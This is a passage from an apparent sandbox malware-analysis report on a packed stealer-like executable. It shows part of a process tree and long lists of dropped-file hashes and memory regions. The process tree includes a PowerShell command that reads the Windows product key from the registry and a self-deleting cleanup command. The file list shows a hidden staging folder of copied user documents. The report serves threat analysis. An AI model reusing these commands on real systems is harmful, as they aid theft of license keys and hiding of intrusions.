                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                3⤵
                                                                  PID:3164
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:396
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\CBLines.exe""
                                                                  3⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  PID:1348
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping localhost -n 3
                                                                    4⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:2196

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                              SHA1

                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                              SHA256

                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                              SHA512

                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              64B

                                                              MD5

                                                              5caad758326454b5788ec35315c4c304

                                                              SHA1

                                                              3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                              SHA256

                                                              83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                              SHA512

                                                              4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              944B

                                                              MD5

                                                              6c47b3f4e68eebd47e9332eebfd2dd4e

                                                              SHA1

                                                              67f0b143336d7db7b281ed3de5e877fa87261834

                                                              SHA256

                                                              8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

                                                              SHA512

                                                              0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              944B

                                                              MD5

                                                              cadef9abd087803c630df65264a6c81c

                                                              SHA1

                                                              babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                              SHA256

                                                              cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                              SHA512

                                                              7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              612B

                                                              MD5

                                                              0639c6ea27d503d4ffa074a55f836ff3

                                                              SHA1

                                                              87ee2d9c6456ce80ef02b0e1a2bf77c6783073f6

                                                              SHA256

                                                              60882bf0dc0d025472542820ed2a48b6b8a9e2b6ac2c275d40d6f855c66be87b

                                                              SHA512

                                                              285c820007e6a0570cf677b2e7a9976ce32b13e7b6a578d693f05354ad1fb9be977a60a97c0ab7504859aac94731cdff55a9b2d52285bee0dc661f693e5e7e36

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              4df4ef707a4d881224b023b119b108e2

                                                              SHA1

                                                              4e7043ec19dd7d0398b8d59db5f56e96f3c65fa1

                                                              SHA256

                                                              40b88b00fed4f927b1c8e77beffac4df496ef4f4c768ba8fb751a9cb415ece61

                                                              SHA512

                                                              54dc66e0cc4bddd984b849d99a505b9639f87bd4beaec4fc2301fbe128bb9168e9c43f2aeed1fa5828b8785ebc7d668c4b2fb1cfa2218f57fe59355d0511f669

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              548dd08570d121a65e82abb7171cae1c

                                                              SHA1

                                                              1a1b5084b3a78f3acd0d811cc79dbcac121217ab

                                                              SHA256

                                                              cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

                                                              SHA512

                                                              37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

                                                            • C:\Users\Admin\AppData\Local\Temp\RES7E38.tmp

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              a6005f640b457ae6d9cf4ee5d8f95706

                                                              SHA1

                                                              c78584af8fc71bfcf3246cd0264e9a7b03aec2aa

                                                              SHA256

                                                              790aa75756df1e579cb257817a09a0c96ee6edf91265ca7af8ffdbde5c479ecb

                                                              SHA512

                                                              adc45c617f1996a6992fbdeb655569f9f33ea8b90e037c2b6c013c46f7c0279c370c4192cb5f1cda83730756946eacb839f6b607627ccc33a36469957add9cc2

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\VCRUNTIME140.dll

                                                              Filesize

                                                              106KB

                                                              MD5

                                                              870fea4e961e2fbd00110d3783e529be

                                                              SHA1

                                                              a948e65c6f73d7da4ffde4e8533c098a00cc7311

                                                              SHA256

                                                              76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

                                                              SHA512

                                                              0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_bz2.pyd

                                                              Filesize

                                                              48KB

                                                              MD5

                                                              83b5d1943ac896a785da5343614b16bc

                                                              SHA1

                                                              9d94b7f374030fed7f6e876434907561a496f5d9

                                                              SHA256

                                                              bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

                                                              SHA512

                                                              5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_ctypes.pyd

                                                              Filesize

                                                              58KB

                                                              MD5

                                                              7ecc651b0bcf9b93747a710d67f6c457

                                                              SHA1

                                                              ebb6dcd3998af9fff869184017f2106d7a9c18f3

                                                              SHA256

                                                              b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a

                                                              SHA512

                                                              1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_decimal.pyd

                                                              Filesize

                                                              106KB

                                                              MD5

                                                              0cfe09615338c6450ac48dd386f545fd

                                                              SHA1

                                                              61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

                                                              SHA256

                                                              a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

                                                              SHA512

                                                              42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_hashlib.pyd

                                                              Filesize

                                                              35KB

                                                              MD5

                                                              7edb6c172c0e44913e166abb50e6fba6

                                                              SHA1

                                                              3f8c7d0ff8981d49843372572f93a6923f61e8ed

                                                              SHA256

                                                              258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

                                                              SHA512

                                                              2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_lzma.pyd

                                                              Filesize

                                                              85KB

                                                              MD5

                                                              71f0b9f90aa4bb5e605df0ea58673578

                                                              SHA1

                                                              c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

                                                              SHA256

                                                              d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

                                                              SHA512

                                                              fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_queue.pyd

                                                              Filesize

                                                              25KB

                                                              MD5

                                                              f1e7c157b687c7e041deadd112d61316

                                                              SHA1

                                                              2a7445173518a342d2e39b19825cf3e3c839a5fe

                                                              SHA256

                                                              d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339

                                                              SHA512

                                                              982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_socket.pyd

                                                              Filesize

                                                              43KB

                                                              MD5

                                                              57dc6a74a8f2faaca1ba5d330d7c8b4b

                                                              SHA1

                                                              905d90741342ac566b02808ad0f69e552bb08930

                                                              SHA256

                                                              5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

                                                              SHA512

                                                              5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_sqlite3.pyd

                                                              Filesize

                                                              56KB

                                                              MD5

                                                              72a0715cb59c5a84a9d232c95f45bf57

                                                              SHA1

                                                              3ed02aa8c18f793e7d16cc476348c10ce259feb7

                                                              SHA256

                                                              d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad

                                                              SHA512

                                                              73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\_ssl.pyd

                                                              Filesize

                                                              62KB

                                                              MD5

                                                              8f94142c7b4015e780011c1b883a2b2f

                                                              SHA1

                                                              c9c3c1277cca1e8fe8db366ca0ecb4a264048f05

                                                              SHA256

                                                              8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c

                                                              SHA512

                                                              7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\base_library.zip

                                                              Filesize

                                                              1.4MB

                                                              MD5

                                                              2efeab81308c47666dfffc980b9fe559

                                                              SHA1

                                                              8fbb7bbdb97e888220df45cc5732595961dbe067

                                                              SHA256

                                                              a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad

                                                              SHA512

                                                              39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\blank.aes

                                                              Filesize

                                                              124KB

                                                              MD5

                                                              fe9e762de4193a61c7ebdf28e571957f

                                                              SHA1

                                                              3d59fa3aa098c5077a476fdd981d9b76f6b72420

                                                              SHA256

                                                              ab3783f6abdcebd7769a4c484bb892a72681e7097bf195c120c05c02d088c407

                                                              SHA512

                                                              d85e9ef5407b6a24abe6b6619f3bcc53b4f74abcac5a66c5a37b0627702cdce3019444303d1c11a80bbe66433614a1bdfb0f8a372ba058468650122a94182e46

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\libcrypto-1_1.dll

                                                              Filesize

                                                              1.1MB

                                                              MD5

                                                              e5aecaf59c67d6dd7c7979dfb49ed3b0

                                                              SHA1

                                                              b0a292065e1b3875f015277b90d183b875451450

                                                              SHA256

                                                              9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

                                                              SHA512

                                                              145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\libffi-8.dll

                                                              Filesize

                                                              27KB

                                                              MD5

                                                              87786718f8c46d4b870f46bcb9df7499

                                                              SHA1

                                                              a63098aabe72a3ed58def0b59f5671f2fd58650b

                                                              SHA256

                                                              1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33

                                                              SHA512

                                                              3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\libssl-1_1.dll

                                                              Filesize

                                                              203KB

                                                              MD5

                                                              7bcb0f97635b91097398fd1b7410b3bc

                                                              SHA1

                                                              7d4fc6b820c465d46f934a5610bc215263ee6d3e

                                                              SHA256

                                                              abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

                                                              SHA512

                                                              835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\python311.dll

                                                              Filesize

                                                              1.6MB

                                                              MD5

                                                              1e76961ca11f929e4213fca8272d0194

                                                              SHA1

                                                              e52763b7ba970c3b14554065f8c2404112f53596

                                                              SHA256

                                                              8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0

                                                              SHA512

                                                              ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\rar.exe

                                                              Filesize

                                                              615KB

                                                              MD5

                                                              9c223575ae5b9544bc3d69ac6364f75e

                                                              SHA1

                                                              8a1cb5ee02c742e937febc57609ac312247ba386

                                                              SHA256

                                                              90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                              SHA512

                                                              57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\rarreg.key

                                                              Filesize

                                                              456B

                                                              MD5

                                                              4531984cad7dacf24c086830068c4abe

                                                              SHA1

                                                              fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                              SHA256

                                                              58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                              SHA512

                                                              00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\select.pyd

                                                              Filesize

                                                              25KB

                                                              MD5

                                                              938c814cc992fe0ba83c6f0c78d93d3f

                                                              SHA1

                                                              e7c97e733826e53ff5f1317b947bb3ef76adb520

                                                              SHA256

                                                              9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e

                                                              SHA512

                                                              2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\sqlite3.dll

                                                              Filesize

                                                              607KB

                                                              MD5

                                                              abe8eec6b8876ddad5a7d60640664f40

                                                              SHA1

                                                              0b3b948a1a29548a73aaf8d8148ab97616210473

                                                              SHA256

                                                              26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d

                                                              SHA512

                                                              de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI12322\unicodedata.pyd

                                                              Filesize

                                                              295KB

                                                              MD5

                                                              908e8c719267692de04434ab9527f16e

                                                              SHA1

                                                              5657def35fbd3e5e088853f805eddd6b7b2b3ce9

                                                              SHA256

                                                              4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239

                                                              SHA512

                                                              4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a4muyfxt.qgw.ps1

                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            • C:\Users\Admin\AppData\Local\Temp\anmuxm5m\anmuxm5m.dll

                                                              Filesize

                                                              4KB

                                                              MD5

                                                              bec079cff475eb64fc6fdcc1d07a9309

                                                              SHA1

                                                              7b7c8c0427fb7913413ac1aa9756d67ae3f1b408

                                                              SHA256

                                                              b40771fc008b959ded58d844a5ed878eb3e36e4a132240cfb4241b8f41980315

                                                              SHA512

                                                              5ee30da104ebaacfcf4b914fc92cc4c6440ab94b6c626333765733402e453285b04a1b019099ba3b20b4c309ba3f1918ec322a9ed5ba34111ad58d224e3a42c3

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Desktop\ConnectComplete.mp3

                                                              Filesize

                                                              304KB

                                                              MD5

                                                              6330ad8076ba65ddaab886999bf6422c

                                                              SHA1

                                                              508e27b27eea1d05e6495517ba35a7fa7923701c

                                                              SHA256

                                                              36d7892abe647b7ce595f396d91e4504ab020fc6e205fe349df0c24dba1ec0d9

                                                              SHA512

                                                              4b033025edc5f655f801704fea667234ab84c7ceca37c8bad0a7c42f31f224301960d03d5b1e8af44664eca101a7b09bbae83b842b8659f74359cd4f31890348

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Desktop\ConvertToOpen.xlsx

                                                              Filesize

                                                              432KB

                                                              MD5

                                                              59feef2dcdc4d78f80e8d205fe78735f

                                                              SHA1

                                                              4265294b58347b6a6adbaa090c354847580b37ac

                                                              SHA256

                                                              0355b43b217d5d3d52ece755ccba2ce695d1b14acddf0ce0934006fa03df9747

                                                              SHA512

                                                              d8e0408a6cb044953f33780178b785558432ff92a2e4154dd8089a9681473b147c35620367e1072866a3d73415d1f7e4a5eb5bb96ceec767d80f4fa51fc6c9d3

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Desktop\PingNew.pdf

                                                              Filesize

                                                              192KB

                                                              MD5

                                                              b863add69a8a73c45414ac74be6a7556

                                                              SHA1

                                                              5c2cf6033d6d96d4a3c72a20d450599f17e7f85e

                                                              SHA256

                                                              c840de3e6b23ea0f9bf9d52a96f0e37a42e995b672bfdd079519c364ec84747e

                                                              SHA512

                                                              77c899a3b31835dee59d8a4c13de678b4af11d80f6fcaacf079ee9b9a0311c987bc6477255904b56c1c57799420671121399be3b27eaeb643742790249a33d20

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Desktop\RestartMeasure.mp3

                                                              Filesize

                                                              496KB

                                                              MD5

                                                              9c3021a28ebdd8d44181659f0eebc02e

                                                              SHA1

                                                              88da35632a87cae39c2e8c85815dafd775142df8

                                                              SHA256

                                                              3d7404842de1eb3fd44764874802a41b1c7ffe04502cc0afa1ed8a3402cc5924

                                                              SHA512

                                                              43e1f9d1c75598d9d5c4a785259e0f4070d03cc4333a8adce3b316ca5bd1d1a4ca5d5c4e0a1ad74e49830a86e29faf9cd020e127a33952c94817b745594e6660

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Desktop\SelectExpand.xlsx

                                                              Filesize

                                                              16KB

                                                              MD5

                                                              91c0227ecff243aed69d44fb41e5bf1d

                                                              SHA1

                                                              1897045d3d34980e4719afec1869753f3885dae9

                                                              SHA256

                                                              1b356e9fe1334a74304b9efac0517722594433651b8e061eddb1db93e6a23306

                                                              SHA512

                                                              ca57510aba9f5dea9ef9ba346755a7463f8391e62c3c07e6e2d5d41b00cf4973abb84bd5a39fbe225335917afe6333659122662cb81d59807e9685af19cd73ee

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\ConvertFromDebug.csv

                                                              Filesize

                                                              1.7MB

                                                              MD5

                                                              f9c755da7a4d6a6238e76bfeeee83736

                                                              SHA1

                                                              06635f15f17eee1c9f12f72b728d0db19de8aa08

                                                              SHA256

                                                              0cc800d9e689ee52455a8e2a78c884a16bdccdc01b03323b0dcaf3144b4b302a

                                                              SHA512

                                                              fee82abcf0c6592c1b81ec284d385dcce73b126769794fb7d31bf58bca102ed76f0a2ca785150a2d384c3877dd324f488be717c75b254c401e6ac47486c4f404

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\OpenRead.xlsx

                                                              Filesize

                                                              11KB

                                                              MD5

                                                              49852b8cfb52e3ca2d033653b6a9ca67

                                                              SHA1

                                                              550fa57068e43936095908769220434b6fc12138

                                                              SHA256

                                                              9b03480242eb8b3339cb39f6793719b668ce55ff64a5bc093fa552e0d96654b5

                                                              SHA512

                                                              98273d80d80741676c3fcf25a50ad9e6018d7fa13e7640db211b791496ece5957544f637218465973f41a74f4326088b77ed25b1494c2542d25204488aacb06c

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\OpenResolve.docx

                                                              Filesize

                                                              1.3MB

                                                              MD5

                                                              1ed62727edb0594a49177004e5a85917

                                                              SHA1

                                                              4b7b5a7ef15719a78ef8918e0de454150dfca083

                                                              SHA256

                                                              a70162a847767682afb801271291a589f88fe2e6fb01d02c9c2d0cf46426eecf

                                                              SHA512

                                                              cf24aa7635b3a85406647c4fbc880539a85dc165348f2ddbc3fea615a598305f874aa3d5bdaa6649df88a1cf235f6cd7a29e2fd24da6d01d6d331bf14186ed52

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\ShowEnable.xlsx

                                                              Filesize

                                                              12KB

                                                              MD5

                                                              a43a809d126b47e72c839068a88e3377

                                                              SHA1

                                                              c0c003c20da6075f085ecfdf78a4a6f31d9e80b6

                                                              SHA256

                                                              41b0da9e02ff10433ed49e3c8c715818a0e259a1ec5cfa89d579cc6195b656b0

                                                              SHA512

                                                              754af741fcda5e927c7969ab5552ee9146820ff116fa4c2fc12b6a4ef95f3c808ee48ecb3395ca1935abed49afd73a853a838fb801027bed52eda47c665e27dc

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\ShowWrite.csv

                                                              Filesize

                                                              1.1MB

                                                              MD5

                                                              43b8fe886261cfbcd9a9b4d94f867887

                                                              SHA1

                                                              233392cc55b5413ffb50d0c134dd5eaf3d2a6563

                                                              SHA256

                                                              91cf2cd00c8701b6c2280ef2a484efb105d39c7231948a0376f0137f99d71c12

                                                              SHA512

                                                              66870531fe00fbdd6988ad9587379069164b5f93d22a087816c8972136aeebe304b7f83476c1700b7157f3e45afc26600232c115dde71f50dd1f70dc74860d05

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\SuspendRevoke.xlsx

                                                              Filesize

                                                              1.6MB

                                                              MD5

                                                              06538cc4b41a5b6c8c9f1ceaca450068

                                                              SHA1

                                                              867f1993127c55bdc8c7aa642c40b3ec70771c86

                                                              SHA256

                                                              06eaf9c3a9ec715164831e912fdd19d8e55fb8221e5551a474fae57d9db7b30a

                                                              SHA512

                                                              c1387030b4c4d8737b1e6cbf716e1789e5ab7e4950698248dc6abce27f575aaf6d005d8b1bbe9eef644f820fa9cf79d0769e3404ae1fccbff18b80122cf79411

                                                            • C:\Users\Admin\AppData\Local\Temp\‎   ​‏‍‏  \Common Files\Documents\WatchConvertTo.xlsx

                                                              Filesize

                                                              10KB

                                                              MD5

                                                              b6be439e8f8168fb0cd928664f94aaef

                                                              SHA1

                                                              0999d108b73b837ce3e443f3cfba49f356c309e7

                                                              SHA256

                                                              a0f8d969eca5abb10dc54a101508c822e6812fe3783ab4a04672cd4b912f49a3

                                                              SHA512

                                                              59698445876481464310592c2e447e09c3e50f59d56b0a4bd5ec1164b4ac3de330d586ccb4fd445c8c2186da8eae767c6663c9c1282348cf5581042f2bd4e695

                                                            • C:\Windows\System32\drivers\etc\hosts

                                                              Filesize

                                                              2KB

                                                              MD5

                                                              f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                              SHA1

                                                              e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                              SHA256

                                                              a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                              SHA512

                                                              c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                            • \??\c:\Users\Admin\AppData\Local\Temp\anmuxm5m\CSC7C3DDFDAC0BE46669AB7355E431254A8.TMP

                                                              Filesize

                                                              652B

                                                              MD5

                                                              bab9e82a0c894625ab73913bcda45fec

                                                              SHA1

                                                              f19a08c4cb81b0b4503d9eaf8235d350d5e355b5

                                                              SHA256

                                                              f7bbad36f67f167893c81f8df4cf71bbaf033a0704768dc80ff751c8384e9f78

                                                              SHA512

                                                              74a6e57f13eb7f67cdcef33bc499fa102bee1605d8f217e50cf7212f32b82b73474fa55eb3bf70a1c83548ae28d66c51765c8813418c7647bdcf050b05329595

                                                            • \??\c:\Users\Admin\AppData\Local\Temp\anmuxm5m\anmuxm5m.0.cs

                                                              Filesize

                                                              1004B

                                                              MD5

                                                              c76055a0388b713a1eabe16130684dc3

                                                              SHA1

                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                              SHA256

                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                              SHA512

                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                            • \??\c:\Users\Admin\AppData\Local\Temp\anmuxm5m\anmuxm5m.cmdline

                                                              Filesize

                                                              607B

                                                              MD5

                                                              2c1102020443d667e9831995a21e4428

                                                              SHA1

                                                              0d2ac992bfc81ac61e7f571ba610c2fc46ac3e01

                                                              SHA256

                                                              4d0b9fc721e44ef794d411742c22217965042986d378f3dca24e4d4e5c978bf9

                                                              SHA512

                                                              e57310a7ebe9d86472c68ceca8a3c8a00e9c2987f02b0140adf337bfe08c79028cc2a8d6bddf8b7bd990f17f62c25db319fe880cb5da7c5418e219d97ec4d1e3

                                                            • memory/1224-30-0x00007FF810D60000-0x00007FF810D83000-memory.dmp

                                                              Filesize

                                                              140KB

                                                            • memory/1224-171-0x00007FF80B9B0000-0x00007FF80BB1F000-memory.dmp

                                                              Filesize

                                                              1.4MB

                                                            • memory/1224-76-0x00007FF80C0E0000-0x00007FF80C0F4000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/1224-83-0x00007FFFFBAC0000-0x00007FFFFBBDC000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/1224-79-0x00007FF80C0D0000-0x00007FF80C0DD000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/1224-360-0x00007FF80C0E0000-0x00007FF80C0F4000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/1224-70-0x00007FFFFBBE0000-0x00007FFFFC1CA000-memory.dmp

                                                              Filesize

                                                              5.9MB

                                                            • memory/1224-71-0x00007FF80BC90000-0x00007FF80BD48000-memory.dmp

                                                              Filesize

                                                              736KB

                                                            • memory/1224-72-0x000001A05C0B0000-0x000001A05C425000-memory.dmp

                                                              Filesize

                                                              3.5MB

                                                            • memory/1224-211-0x00007FF810C50000-0x00007FF810C69000-memory.dmp

                                                              Filesize

                                                              100KB

